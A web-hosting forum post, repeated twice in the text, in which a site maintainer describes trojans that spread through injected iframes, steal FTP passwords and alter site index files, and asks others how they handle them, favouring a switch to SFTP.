For some time trojans that sniff FTP login parameters are making me big headdaches.
Have you met them? How do you handle them?
It works like this:
- you access compromised site, which contains iframe that loads malicious script. Until recently your antivirus did not react on such code.
- malicious code attacks your browser (IE, Firefox, Opera, PDF reader, Flash... all are vurnelable) and installs itself on your computer.
- you now have trojan installed. Each time you access any FTP account, username and password are sniffed and sent to trojan owner. Some trojans also know how to read saved passwords from some well known FTP aplications, so saving passwords in no more an option, even if you maintain number of sites. There are even suspects that some trojans sniff keyboard to get passwords.
- after some time, bots start accessing all FTP accounts they know about and alter index*, main*, and default* files inserting iframe that loads malicious code.
- visitors of the sited als get infected and if they also maintain some sites, their ftp accounts are also compromised.
- there is no antivirus, anti mallware or anti rootkit that detects these trojans. The only way to find out that you have it is to see that your sites are altered.
Recently, antivirus software started to recognize malicious <iframe> in web pages, but only if they scan http. Also Google started to block sites where it crawled malicious <iframes>. This helps limiting trojan spreading but it is far from successful.
I have lots of problems with this. My clients are asking for my help and I do not know what to say, except that they should format hard disks and reinstall system.
My idea was to limit FTP access by IP address, but cpanel does not support that. It can only limit specific address, not limit everything but known addresses.
This pest makes FTP service unusable. If there is no option to control access by FTP, then there is only solution to stop FTP service in whole.
Good thing is that trojan is not able to sniff SFTP connections so, using SFTP (check WinSCP) is good alternative (Dathorn supports it). If you are attacked, change FTP passwords and DO NOT USE FTP ANY MORE.
If you met this pest share your experience and knowledge. Do you think we should ask Dathorn to provide some measures to help about this?
Have you met them? How do you handle them?
It works like this:
- you access compromised site, which contains iframe that loads malicious script. Until recently your antivirus did not react on such code.
- malicious code attacks your browser (IE, Firefox, Opera, PDF reader, Flash... all are vurnelable) and installs itself on your computer.
- you now have trojan installed. Each time you access any FTP account, username and password are sniffed and sent to trojan owner. Some trojans also know how to read saved passwords from some well known FTP aplications, so saving passwords in no more an option, even if you maintain number of sites. There are even suspects that some trojans sniff keyboard to get passwords.
- after some time, bots start accessing all FTP accounts they know about and alter index*, main*, and default* files inserting iframe that loads malicious code.
- visitors of the sited als get infected and if they also maintain some sites, their ftp accounts are also compromised.
- there is no antivirus, anti mallware or anti rootkit that detects these trojans. The only way to find out that you have it is to see that your sites are altered.
Recently, antivirus software started to recognize malicious <iframe> in web pages, but only if they scan http. Also Google started to block sites where it crawled malicious <iframes>. This helps limiting trojan spreading but it is far from successful.
I have lots of problems with this. My clients are asking for my help and I do not know what to say, except that they should format hard disks and reinstall system.
My idea was to limit FTP access by IP address, but cpanel does not support that. It can only limit specific address, not limit everything but known addresses.
This pest makes FTP service unusable. If there is no option to control access by FTP, then there is only solution to stop FTP service in whole.
Good thing is that trojan is not able to sniff SFTP connections so, using SFTP (check WinSCP) is good alternative (Dathorn supports it). If you are attacked, change FTP passwords and DO NOT USE FTP ANY MORE.
If you met this pest share your experience and knowledge. Do you think we should ask Dathorn to provide some measures to help about this?
Comment